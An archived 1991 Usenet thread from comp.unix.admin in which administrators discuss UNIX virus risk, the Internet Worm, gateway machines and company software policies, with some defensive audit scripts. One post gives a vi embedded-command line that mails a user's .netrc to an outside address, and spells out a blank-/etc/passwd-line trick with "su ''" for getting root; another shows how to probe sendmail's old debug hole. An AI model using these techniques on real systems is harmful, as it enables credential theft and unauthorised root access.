[comp.unix.admin] Questions about UNIX viruses

dag@esleng.ocunix.on.ca (Dave Gilmour) (04/02/91)

Our company is currently under contract to provide some software to a customer
that is worried that, because our system is connected to the USENET, it could
potentially become infected with a virus and subsequently transmit that virus
to their machine via the delivered software.

Given this, I basically have three questions:

1)	Are viruses a problem on UNIX machines that are connected to the
	net?  We do not accept UNIX binaries on our machine, only sources, so I
	presume that trojans are more likely to be a problem than viruses.

2)	If viruses are out there ready to infect my UNIX machine, is there
	any software that I can run to detect/remove them from my machine?

3)	What steps should I take in order to "reduce the risk" |-)

Any help in the matter will be greatly appreciated. As always, if there is
sufficient interest I will summarize to the net.

Thanks.

System Info : ISC2.2 System V R3.2, Everex Step 386/33

-- 
__________________________________________________________________________
David A. Gilmour            |   dag@esleng.ocunix.on.ca
Excalibur Systems Limited   |   uunet!mitel!cunews!micor!esleng!dag
Kanata, Ontario, Canada     |

raisch@Control.COM (Robert Raisch) (04/02/91)

dag@esleng.ocunix.on.ca (Dave Gilmour) writes:

>1)	Are viruses a problem on UNIX machines that are connected to the
>	net?  We do not accept UNIX binaries on our machine, only sources, so I
>	presume that trojans are more likely to be a problem than viruses.

Not in my experience, though the Internet Worm episode does make a lot
of people edgy.

It should be noted that the Worm used WELL KNOWN trapdoors and flaws in 
systems software to attack.  Both Sun and DEC were aware of these security
holes as far back as 1980.  Thus it becomes a question of who is culpable,
and how we get the suppliers of systems software to secure their products.

IMHO, the Worm episode was a good thing.  (*flames >/nev/dull*)

>2)	If viruses are out there ready to infect my UNIX machine, is there
>	any software that I can run to detect/remove them from my machine?

None that I am aware of, though a good network monitoring program can tell
volumes (if you are conversant in the various net protocols).

>3)	What steps should I take in order to "reduce the risk" |-)

If you compile a source distribution that you have received from the net
on your machine:

		READ THE SOURCE!!!! 
		UNDERSTAND WHAT IT IS DOING!!!!

An ounce of prevention, blah blah blah.
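
If reading every line of a big distribution isn't practical, at least take
an inventory of the risky spots first.  A rough sketch (the ./pkg directory
name is made up; point it at wherever you unpacked the sources):

	# Not a substitute for reading the code, just a map of where to look.
	cd ./pkg
	# Anything that runs commands, opens sockets, or changes uids
	# deserves a careful reading by hand.
	find . -name '*.c' -print | xargs egrep -n \
		'system\(|popen\(|exec[lv]|setuid|setgid|socket\('
	# The Makefiles matter too: install rules that chown to root or
	# set a setuid bit should be understood before "make install".
	find . -name '[Mm]akefile*' -print | xargs egrep -n 'chown|chmod|setuid'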

>Any help in the matter will be greatly appreciated. As always, if there is
>sufficient interest I will summarize to the net.

I felt that this response would be of general interest, thus I posted.

>Thanks.

No prob.
-- 
"I ate his liver with some fava beans and a nice chianti." -Lector

rbraun@spdcc.COM (Rich Braun) (04/03/91)

I have the same problem.  Our company is adding a number of Unix systems to
a large, existing network of DOS systems.  A recent problem with a DOS virus
has some of our management edgy, to the point of asking "why shouldn't we
just isolate the engineering department entirely?"  I do not post directly
from my company, as we have no Internet connection and none is likely unless
I can (a) cost-justify it and (b) come up with solid arguments as to how
I can guarantee system integrity and file security.

If there are any published accounts (books, papers, magazine articles)
available on this subject, I'd love to have them in order to present
better arguments.  Detailed descriptions of past security problems (with
things like TCP/IP, uucp, SCO Unix, ISC, AIX) and how they were resolved
would be real useful.  I personally know that the class of problems under
Unix is vastly different from the "virus" concept of personal computers,
but it's hard to explain to those who aren't familiar with Unix.

A free flow of information is what every engineer wants, and what every
executive fears.

-rich

torek@elf.ee.lbl.gov (Chris Torek) (04/03/91)

In article <1177@cthulhuControl.COM> raisch@Control.COM (Robert Raisch) writes:
>It should be noted that the [Internet] Worm used WELL KNOWN trapdoors and
>flaws in systems software to attack.  Both Sun and Dec were aware of these
>security holes as far back as 1980.

Oh really?  Please produce some evidence to this effect.  Also, for those
of you who knew these so well, why did you not inform Berkeley CSRG?

This is not intended as a flame on Robert Raisch; the rumor that the
finger and sendmail bugs were `well known' goes around regularly, but
seems to have no real grounds.
-- 
In-Real-Life: Chris Torek, Lawrence Berkeley Lab CSE/EE (+1 415 486 5427)
Berkeley, CA		Domain:	torek@ee.lbl.gov

kludge@grissom.larc.nasa.gov ( Scott Dorsey) (04/04/91)

In article <11685@dog.ee.lbl.gov> torek@elf.ee.lbl.gov (Chris Torek) writes:
>This is not intended as a flame on Robert Raisch; the rumor that the
>finger and sendmail bugs were `well known' goes around regularly, but
>seems to have no real grounds.

The sendmail bug at least was well-known (although it's more of an unwanted
feature than a bug).  I at least knew about it in 1987 and got into a good
deal of trouble over it.  The finger bug, though, that's tricky.
--scott

nowicki@legato (Bill Nowicki) (04/06/91)

In article <11685@dog.ee.lbl.gov> torek@elf.ee.lbl.gov (Chris Torek) writes:
>... raisch@Control.COM (Robert Raisch) writes:
>>It should be noted that the [Internet] Worm used WELL KNOWN trapdoors and
>>flaws in systems software to attack.  Both Sun and Dec were aware of these
>>security holes as far back as 1980.
>
>Oh really?  Please produce some evidence to this effect.  

I would like to repeat this request. I was the software engineer
working on sendmail for Sun at the time, and it was news to me.
Although several people claimed to have "known" about the bug, when
pressed for details they got very defensive or changed their story.
Nobody has yet produced any evidence to me that they knew of this bug
before the Worm.  If they did know, it was quite irresponsible of them
not to report it to anybody.

Compare this to the people who claimed they "knew" about the 1989
earthquake around here before it happened. Sure.  And if you believe
that....

	Bill Nowicki
	Legato Systems

tr@samadams.princeton.edu (Tom Reingold) (04/08/91)

In article <579@bria> uunet!bria!mike writes:

$ [...]
$ The point I'm making (while being a wise-ass in the process) is that there
$ is no way to truly protect your machine.  If someone wants to do you damage
$ badly enough, they will find a way.  For every security guru out there,
$ there are a dozen 14 year-olds with nothing better to do than make our
$ lives hell.
$ 
$ My personal recommendation is: do what is reasonable (passwords, etc.)
$ and don't worry too much about it.  I don't curse the sky when it rains,
$ either ...

You are right, but you missed something.  Someone in the corporation may
make the point, valid or not, that publicizing the existence of an
easy-to-get-to machine or login makes it more vulnerable than a machine
or login that is unknown.  Connecting well is a form of publicity.
Once you're there, people notice.  Posting news makes you much more
noticeable.

I am facing this at my job (which is not at Princeton University).  The
company I work for has a policy of (almost) no internet connections.
Worse, it has a policy that we are not to have any non-company-owned
software on our computers.  This means no software from Usenet.  I
think the goal may be reasonable, but I think the means are not for two
reasons: 1. the policy probably won't work, and 2. it restricts free
exchange of ideas.  The latter, in my belief, affects productivity, so
bottom-line-watchers ought to care about it too.
--
        Tom Reingold
        tr@samadams.princeton.edu  OR  ...!princeton!samadams!tr
        "Warning: Do not drive with Auto-Shade in place.  Remove
        from windshield before starting ignition."

Link_-_APO@cup.portal.com (04/08/91)

Hi,
     I myself just finished reading a new and enlightening book on UNIX system 
security titled "UNIX System Security - How To Protect Your Data and 
Prevent Intruders". Rik Farrow is the author and Addison Wesley is the
publisher.
     For those of you who are flaming about the sendmail and finger
'bugs', the chapter on Communication and Network Security includes
the stories behind those security problems.
-------------------------------------------------------------------------
   ^-^     
  (`|') /) CAE Link Flight        link_apo@cup.portal.com
  /   \//  Sandy Johan	          sun!portal!cup.portal.com!link_apo 
 ( | | )   1077 E. Arques Ave
  \O-O/    Sunnyvale, CA 94088

rbraun@spdcc.COM (Rich Braun) (04/09/91)

uunet!bria!mike writes:
>How to achieve absolute security:
>
>	Never purchase a computer; ...
>
>The point I'm making (while being a wise-ass in the process) is that there
>is no way to truly protect your machine.  If someone wants to do you damage
>badly enough, they will find a way.
>...
>My personal recommendation is: do what is reasonable (passwords, etc.)
>and don't worry too much about it.

This is not particularly helpful advice when trying to justify modems,
Internet connections, electronic mail, etc. to a conservative executive.
A case in point:  Oracle only got its electronic mail systems up and
running within the past year or two.  Their original policy was to
restrict access, for security reasons.  Digital still has a policy of
restricting all Internet communications except those going through a
single bottleneck.

Out in the real world, at real companies, security is still a major
issue.  Telling an executive to "do what is reasonable and don't worry"
just isn't going to give the engineer what he wants:  instant
communications access to other folks who can answer his questions.

Some companies, like BBN, open up the floodgates and allow anyone on
the Net to beat on their software.  That's in their interest, because
they are in the business of selling well-tested network software.  Most
others do not share that level of disregard for data security.

I've gotten a couple of personal e-mail responses letting me know of
published accounts regarding Unix and network security.  One of them is
the June 1990 issue of Unix World, which I'll have to go investigate.

-rich

cjc@ulysses.att.com (Chris Calabrese) (04/09/91)

In article <1991Apr8.062054.11868@newross.Princeton.EDU> tr@samadams.princeton.edu (Tom Reingold) writes:
[ stuff about security by uunet.bria!mike deleted ...]
>
>You are right, but missed something.  Someone in the corporation may
>make the point, valid or not, that publicizing the existence of an
>easy-to-get-to machine or login makes it more vulnerable than a machine
>or login that is unknown.  Connecting well is a form of publicity.
>Once you're there, people notice.  Posting news makes you much more
>noticeable.

One way around this problem is to set aside a machine as a gateway.
This machine can run news, uucp, etc. to the outside world and lets in
network traffic from the rest of the site; however, the rest of the
site doesn't trust it at all.

That's what happens here.  I read and write news at my desk
(workstation or X terminal connected to a server), and all the traffic
happens via nntp on our gateway machine.  I can rlogin into the gateway
machine, and I can rcp to and from it from my desk, but once I'm
logged into the gateway machine I can't rlogin out of it or rcp
to/from anywhere.
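
For what it's worth, the one-way trust is the part worth checking now and
then.  A rough sketch (the host name "gateway" is invented; adapt it to
your own setup):

	# On each inside machine: the gateway must NOT appear as a trusted
	# host, or a break-in there walks right past the passwords.
	# (A lone "+" in hosts.equiv trusts everyone, which is worse.)
	grep -i gateway /etc/hosts.equiv $HOME/.rhosts 2>/dev/null
	grep '^+$' /etc/hosts.equiv 2>/dev/null
	# On the gateway itself: no hosts.equiv entries, and no stray
	# .rhosts files offering it a free ride back out.
	cat /etc/hosts.equiv 2>/dev/null
	find / -name .rhosts -print 2>/dev/null

The idea is simply that people inside can reach the gateway, but nothing
the gateway says is taken on faith.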

>I am facing this at my job (which is not at Princeton University).  The
>company I work for has a policy of (almost) no internet connections.
>Worse, it has a policy that we are not to have any non-company-owned
>software on our computers.  This means no software from Usenet.  I
>think the goal may be reasonable, but I think the means are not for two
>reasons: 1. the policy probably won't work, and 2. it restricts free
>exchange of ideas.  The latter, in my belief, affects productivity, so
>bottom-line-watchers ought to care about it too.

I would agree that this is a foolish policy.  I can understand their
security fears, but I believe that the free exchange of ideas is
extremely important in a scientific/engineering community.

As for the no non-company-owned software thing, I would say that this
is almost impossible to enforce in the real world.  The amount of
useful software that's available publicly is just too great (the MIT X
Windows distribution, GNU software, etc).  Many vendors even ship some
of this stuff with their systems!

A more practical strategy on free software is to openly allow software
posted to the moderated net-news groups, and available on "official"
distributions (the MIT X distribution, the Columbia Kermit
distribution, etc).

After that, you can have a more restrictive policy on other forms of
free software (like stuff from alt.sources); however, even that should
allow such software to make its way onto the system after the source
has been reviewed by the local gurus (or has been accepted by the
net.community at large).

Most successful attacks on UNIX boxes that I know of have come in
straight through the front door.  Nothing so fancy as net software
that had secret password cracking stuff in assembler coded into the
error messages that got executed if the machine was a Sun.

Just look at the famous Internet Worm.  Everything it did relied on
bugs in the vendor-supplied software, or on shortcomings in the way
people chose their passwords.

Name:			Christopher J. Calabrese
Brain loaned to:	AT&T Bell Laboratories, Murray Hill, NJ
att!ulysses!cjc		cjc@ulysses.att.com
Obligatory Quote:	``pher - gr. vb. to schlep.  phospher - to schlep light.  philosopher - to schlep thoughts.''

jc@minya.UUCP (John Chambers) (04/13/91)

In article <2755@legato.Legato.COM>, nowicki@legato (Bill Nowicki) writes:
> In article <11685@dog.ee.lbl.gov> torek@elf.ee.lbl.gov (Chris Torek) writes:
> >... raisch@Control.COM (Robert Raisch) writes:
> >>It should be noted that the [Internet] Worm used WELL KNOWN trapdoors and
> >>flaws in systems software to attack.  Both Sun and Dec were aware of these
> >>security holes as far back as 1980.
> >
> >Oh really?  Please produce some evidence to this effect.  
> I would like to repeat this request. I was the software engineer
> working on sendmail for Sun at the time, and it was news to me.

The sendmail problem I don't  have  any  history  on,  but  there  are
several  other similar problems in Unix utilities for which I can give
examples with dates that show how hard it can be to get the news out.

Back in '83 (just after I moved to Massachusetts, so I know I have the
date right) there was a flurry of dire warnings  on  several  bulletin
boards  concerning  a  new  "feature"  in the vi editor.  This was the
ability of vi to notice  embedded  lines  starting  with  a  ':',  and
interpret  them as vi commands during initial loading of the file.  It
was pointed out  what  could  be  done  by  sending  mail  to  a  user
(especially a super-user) that contained lines like:
	:!mail joe@some.where <$HOME/.netrc
	:-,.d  
This is of course a valuable feature of vi, but it should be  disabled
by  default (as it is now in most releases), so that the user must put
something in $EXINIT or .exrc to enable it.

It  has  been  8  years  since this was widely publicised.  Just a few
months ago I discovered that the vi from one  vendor  still  had  this
feature enabled by default. 8 years! I was tempted to email them a bug
report that did something like the above to illustrate the problem.  I
resisted, and just embedded a command like 
	:!echo "There's a security hole in the vi editor."|mail root $USER
No, I won't tell you which vendor this was.  You should try it on your
system, and if it works, you know what to do.
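
If you'd rather test your own vi without mailing anybody anything, a
harmless file in the same spirit will do (a sketch; the path is arbitrary):

	# Build a file whose first line is a vi command that only prints.
	echo ':!echo "this vi still executes commands embedded in files"' > /tmp/vitest
	echo 'just an ordinary line of text' >> /tmp/vitest
	vi /tmp/vitest	# if the message (or a shell escape) appears, it's live
	rm /tmp/vitest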

For another example, it's now been almost exactly  10  years  since  I
learned  about  the problems caused by a blank line in the /etc/passwd
file.  Many vendors have fixed it; others haven't.  For instance, last
year I saw some shocked expressions on the faces of a number of people
at Digital when I asked them to add such a blank line, then typed:
	su '' 
in a non-super-user window and immediately got a '#' prompt.  This was
on some Ultrix 3.1 systems.  Recently, I tried it on some 4.1 systems,
and to my relief it no longer worked.  But it took nearly a decade  to
correct this problem in Ultrix, and it has been known to me and others,
and described in articles like this, over and over and over.

You might try it on your system.  If it doesn't  work,  try  one  more
experiment.   With  the blank line in the password file and after your
entry, change your own password, and then try  the  "su  ''"  command.
Sometimes the blank line itself won't work, but when some user changes
his password, the rest of the /etc/passwd file gets rewritten, and the
blank line becomes:
	::0::::
which is the null-super-user entry that elicits the bug.
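
If you'd rather look for the hole than create it, a couple of awk
one-liners will flag the dangerous entries (a sketch; it assumes the
usual seven-field /etc/passwd format):

	# Entries with an empty password field, or uid 0 under any name
	# other than root, deserve an explanation.
	awk -F: '$2 == "" { print "no password:  " $0 }
	         $3 == 0 && $1 != "root" { print "extra uid 0:  " $0 }' /etc/passwd
	# And any line without exactly seven fields is suspect.
	awk -F: 'NF != 7 { print "malformed, line " NR ": " $0 }' /etc/passwd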

10 years!?

How do you get the  word  out?   Both  of  these  problems  have  been
thoroughly  documented on numerous bulletin-boards.  Lots of email has
passed back and forth describing them.   Why  the  #*&%^$&  is  it  so
difficult to correct such problems?

As for sendmail, well, I haven't  followed  the  appropriate  bulletin
boards  to  see  all the warnings that may or may not have been there.
But really, I don't need to.  Just look  around  at  how  sendmail  is
installed. Almost everywhere, it runs as root, talks on TCP port 25 in
ASCII to anyone who knows its language,  requires  no  authentication,
and is capable of running shell commands in response to its input. Add
to that the fact that it is "controlled" by  a  config  file  that  is
poorly understood by all but a handful of experts, and you have a sure
entryway for all sorts of unwanted actions.  I mean, it doesn't take a
genius  to  realize  the  potential.   How  could anyone with even the
slightest understanding of computer security not be suspicious?   What
bigger red flag could there possibly be?

[Well, OK, you could install DOS. ;-]
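
If you're skeptical, you can see just how wide that door is by talking to
the daemon yourself.  A sketch (the host name is invented, and this only
looks; it doesn't change anything):

	telnet somehost 25
	# No password, no authentication -- just a plain ASCII conversation.
	# The 220 greeting usually announces the sendmail version.  On the
	# old releases the Worm hit, typing "debug" got back a "200" reply;
	# a fixed sendmail answers "500 Command unrecognized".  Type "quit"
	# to hang up.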

-- 
All opinions Copyright (c) 1991 by John Chambers.  Inquire for licensing at:
Home: 1-617-484-6393 
Work: 1-508-486-5475
Uucp: ...!{bu.edu,harvard.edu,ima.com,eddie.mit.edu,ora.com}!minya!jc 

jc@minya.UUCP (John Chambers) (04/20/91)

> >I am facing this at my job (which is not at Princeton University).  The
> >company I work for has a policy of (almost) no internet connections.
> >Worse, it has a policy that we are not to have any non-company-owned
> >software on our computers.  This means no software from Usenet.  I
> >think the goal may be reasonable, but I think the means are not for two
> >reasons: 1. the policy probably won't work, and 2. it restricts free
> >exchange of ideas.  The latter, in my belief, affects productivity, so
> >bottom-line-watchers ought to care about it too.
> 
> I would agree that this is a foolish policy.  I can understand their
> security fears, but I believe that the free exchange of ideas is
> extremely important in a scientific/engineering community.

Yeah; this is why historically most scientific advances have come from
government and university researchers, not from corporations.  The few
exceptions  are  mostly places like Bell Labs, and it's hard to make a
convincing argument that AT&T is really a private corporation;  it  is
more  of a government department thinly disguised by a veneer of paper
to make it look legally private.  The Internet arose from the ARPAnet,
which  was  developed  mostly  at  universities (and a few places like
BB&N) with government funding. Sun's NFS was developed at Stanford.  X
windows was developed at MIT (with DEC and IBM funding, true, but with
repeated firm statements by MIT people that *nothing* developed  there
was  proprietary).  Real  advances  require  open  communication among
developers; corporations usually don't even allow this internally.

> Most successful attacks on UNIX boxes that I know of have come in
> straight through the front door.  Nothing so fancy as net software
> that had secret password cracking stuff in assembler coded into the
> error messages that got executed if the machine was a Sun.
> 
> Just look at the fameous Internet Worm.  Everything it did relied on
> bugs in the vendor supplied software, or in shortcomings in the way
> people chose their passwords.

If  you  read any summary of worms/viruses/etc., one thing that really
stands out is that almost all of them take advantage of vendor-supplied
software.  It's ironic that almost every manager fears the
public domain stuff, which has almost never been  the  source  of  any
problems, while admitting the off-the-shelf commercial stuff, which is
where the problems usually originate.

This isn't saying that the vendors are at fault, of course. After all,
if  you  were  to  try to implement a virus, and you wanted it spread,
what would you use as a vector?  A public-domain program off  the  net
that  is  recompiled  (and  hacked) by a few thousand programmers on a
wide variety of systems, and who will see your code?   Or  a  vendor's
utility,  which  is delivered in binary form to all of their customers
and installed by someone who hasn't even looked at it? Silly question,
right?

It's especially ironic that there is widespread fear of email and news
links as sources of viruses, when the records show clearly that almost
all  infections  are via swapped disks and tapes that contain doctored
versions of commercial programs.

The perception and the reality here have very little relationship.

-- 
All opinions Copyright (c) 1991 by John Chambers.  Inquire for licensing at:
Home: 1-617-484-6393 
Work: 1-508-486-5475
Uucp: ...!{bu.edu,harvard.edu,ima.com,eddie.mit.edu,ora.com}!minya!jc 

clewis@ferret.ocunix.on.ca (Chris Lewis) (04/23/91)

> >I am facing this at my job (which is not at Princeton University).  The
> >company I work for has a policy of (almost) no internet connections.
> >Worse, it has a policy that we are not to have any non-company-owned
> >software on our computers.  This means no software from Usenet.  I
> >think the goal may be reasonable, but I think the means are not for two
> >reasons: 1. the policy probably won't work, and 2. it restricts free
> >exchange of ideas.  The latter, in my belief, affects productivity, so
> >bottom-line-watchers ought to care about it too.

> I would agree that this is a foolish policy.  I can understand their
> security fears, but I believe that the free exchange of ideas is
> extremely important in a scientific/engineering community.

You may be jumping to the conclusion that this is entirely security
related.  There are several other reasons for such a policy:
	- to ensure that they can establish that they are legally entitled
	  to *have* the software in the first place.  More than a few
	  companies have been caught holding pirated copies of commercial
	  software (and some of it has accidentally slipped onto the net).
	- so there are no arguments as to the ownership of pieces of
	  their own products.  E.g.: some company finding out that they can't
	  distribute their product until they negotiate licenses with the
	  originator of a library routine that they used.
	- so that they can maintain some sort of support control over
	  their computer environments.  E.g.: finding out that some PD
	  program has become vital to their operations, and then
	  discovering they can't move to a new machine because it can't
	  run the package.  Management likes knowing their dependencies.
	- Support...
Several major companies have policies that PD is okay, but freeware
(copyrighted) is not.  In some cases these policies are quite justified,
for some companies are frequent targets of "theft of intellectual
property" lawsuits over such things.
-- 
Chris Lewis, Phone: (613) 832-0541, Domain: clewis@ferret.ocunix.on.ca
UUCP: ...!cunews!latour!ecicrl!clewis; Ferret Mailing List:
ferret-request@eci386; Psroff (not Adobe Transcript) enquiries:
psroff-request@eci386 or Canada 416-832-0541.  Psroff 3.0 in c.s.u soon!

richardt@legato (Richard Threadgill) (04/25/91)

In article <713@minya.UUCP> jc@minya.UUCP (John Chambers) writes:
>BB&N) with government funding. Sun's NFS was developed at Stanford.  X
>				^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

You are in error, sir.  While Sun's Network Drive protocol may have been
developed at Stanford (I don't know), NFS was most certainly *not*.  NFS
was entirely developed at Sun, and a number of Sun engineers worked very
hard to persuade corporate that NFS would only be valuable if widely
licensed.

RichardT